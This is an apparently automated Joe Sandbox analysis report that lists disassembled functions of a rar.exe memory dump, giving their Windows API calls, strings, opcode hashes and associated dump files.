Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: 12ce11e02b519585aff22183057c4d781cc225b95609cb1b52070b0ba076ac25
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: A7218426A08B8285EB50AF12F8511FA93A0EF99BE4F945031DF0E47755DE3CD4649730

Function 00007FF7CF8A1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7CF8A21A7,00000000,00000028,?,00007FF7CF897792), ref: 00007FF7CF8A1C97
ReadFile.KERNELBASE ref: 00007FF7CF8A1CB6
GetLastError.KERNEL32 ref: 00007FF7CF8A1CEA
GetLastError.KERNEL32 ref: 00007FF7CF8A1D08

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction ID: 157b8a48920d3d06f8173d427132dae0dc28cef8fe9a225ca303c9aa5b4824c5
Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction Fuzzy Hash: C721C330E09EC686EB60AF21E4003B9E2E0FF41BB4FA10131E96D476C4CE2DD460AB31

Function 00007FF7CF8949F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

default.sfx, xrefs: 00007FF7CF894AB0
AFUM, xrefs: 00007FF7CF894B8C

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: f74de25a0b6da85296585c97b0233469ca22287fad7438237e34b712897383fd
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: 7081B221A086D284EB74BF1194112F9A2E0AF517A8FD4C032DE8D076C6DF3DB6A5E730

Function 00007FF7CF8E3B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E3B36
GetModuleFileNameA.KERNELBASE(?,?,?,?,?,00007FF7CF8DB066), ref: 00007FF7CF8E3B57

Strings

C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, xrefs: 00007FF7CF8E3B45

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe
API String ID: 3307058713-2442246308
Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction ID: 03166b6a8bb6fa0ba55f365d22c70d9691f5e00b08a26829d7ef949846ce3434
Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction Fuzzy Hash: C741923AA086D285EB14BF2598401FCABE4EF44BA4BA54035EE4E47B55DF3DE8619330

Function 00007FF7CF8E65BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7CF8E662E
GetFileType.KERNELBASE ref: 00007FF7CF8E6644

Strings

@, xrefs: 00007FF7CF8E666F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: c77922d44e635ce7ad6de35aa4354e5de687701fd5b0133ea147b3157afd6a88
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: 7921D82AA387C241EB605F2494902B9A7A5FB45774F641335D66E067E8CE3CDCA1E730

Function 00007FF7CF8CB9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF7CF8CB9F8
SetThreadPriority.KERNEL32 ref: 00007FF7CF8CBA4E

Part of subcall function 00007FF7CF89CDA4: wcschr.LIBVCRUNTIME ref: 00007FF7CF89CE0F
Part of subcall function 00007FF7CF89CDA4: wcschr.LIBVCRUNTIME ref: 00007FF7CF89CE22

Part of subcall function 00007FF7CF89CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF89CEDE

Strings

CreateThread failed, xrefs: 00007FF7CF8CBA06

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: d867101ed07ed21bbcbaed98a9774f5de055bc1ac4a0e123cd139745a6159ca3
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: B6114C32A08A8286EB05EF10E8411E9B3A0FB84BA4FD48131E68D43659DF3DE5669730

Function 00007FF7CF8CBB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF7CF8CBB79), ref: 00007FF7CF8CBBB9
SetEvent.KERNEL32 ref: 00007FF7CF8CBBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF7CF8CBBD8

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: a9a8293bfe3958db26911609af57083e5b99740b59e369bbbd38395b941f9526
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 53F06725608BC586DB10AF11E5400FDA3A0FB89FA9F845130DE9D07669CE3CD5659B30

Function 00007FF7CF897B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B4A
GetFileType.KERNELBASE(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B56
GetConsoleMode.KERNEL32(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B69

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: a6eec46321598ebf7c4c9805f4272d1e6ff41ddcd8f5d59cd67147e0b4dd7454
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: 54E0C234F046834BFF586F21A8652B882D19F69BA0FC01034D80F4E750EE2CE4B59330

Function 00007FF7CF8E2488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7CF8E246C), ref: 00007FF7CF8E24B0
TerminateProcess.KERNEL32(?,?,?,00007FF7CF8E246C), ref: 00007FF7CF8E24BB
ExitProcess.KERNEL32 ref: 00007FF7CF8E24CA

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: e120275f286f51f654ae991106ffdd6254088f84e3dcd94aeb1980dd2db7a054
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: 19E01A28E087854BFB447F209C813F963E26F94765F445438CC0E42396CE3DE82CA271

Function 00007FF7CF8A4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF7CF8A4255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF7CF886CD9), ref: 00007FF7CF8A447C

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: da8b584ffcaf93481d81d2d41b9bc2b44c14c1d75082b0bbdd69e90533a1b382
Instruction ID: a3b89952de66526eb2aefc9b26b574e4b4ce3c0c13dea5bda792de317759fdcc
Opcode Fuzzy Hash: da8b584ffcaf93481d81d2d41b9bc2b44c14c1d75082b0bbdd69e90533a1b382
Instruction Fuzzy Hash: 98E1B022A1A6C285EF60AF6494001FEE6E0FB517A4F844131DB9D47AE9DF7CE461E730

Function 00007FF7CF8A1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF7CF897EBE,00000000,00000000,00000000,00000000,00000007,00007FF7CF897C48), ref: 00007FF7CF8A1B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF7CF897EBE,00000000,00000000,00000000,00000000,00000007,00007FF7CF897C48), ref: 00007FF7CF8A1BD7

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: e848a400304ca6e06b85829d1c504152a94da0d143fcbb1395506dcb119acea0
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: B9314663A18AC146E730AF20E4053E9A6E0EB40B78F904334DE6C066C5EF7CC4A69B30

Function 00007FF7CF88681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8868AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8868BF

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: c3920168b70b61791c8899e3a9160050e1f6aac4fe940fd6eec46237c187e774
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: FC218253A08EC582EB019F29D5510B863B0FB98B98F58A321DF8D4365AEF38E5F58310

Function 00007FF7CF8B915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7CF8B91CA
new.LIBCMT ref: 00007FF7CF8B91F2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a4837acc1fc12491c178c3c9be37aa4ece435cae8474025c89e62fe1400727
Instruction ID: f88ed927e9e271ba67200bb1c8486f6704caeeac5a104f28370af1e3ba8ea9a7
Opcode Fuzzy Hash: 90a4837acc1fc12491c178c3c9be37aa4ece435cae8474025c89e62fe1400727
Instruction Fuzzy Hash: 8B118431509BC281EA04BF54A9043E9E2E4EF44BA0FA40635DAAD077EADE7CD0619330

Function 00007FF7CF8A20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF7CF8A22EE), ref: 00007FF7CF8A211B
GetLastError.KERNEL32(?,?,?,00007FF7CF8A22EE), ref: 00007FF7CF8A2126

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: 721e42f3909092a8cfac37962b220a52497d50cef305027e3fab5241379af7b3
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: DE01C231B1A6D143EAB46F26A4000A9A2E1EF54BB0F945230DE2D83BD4CE2CE461A730

Function 00007FF7CF897A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF7CF897A7B

Part of subcall function 00007FF7CF8E2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E7EF3

setbuf.LIBCMT ref: 00007FF7CF897A8F

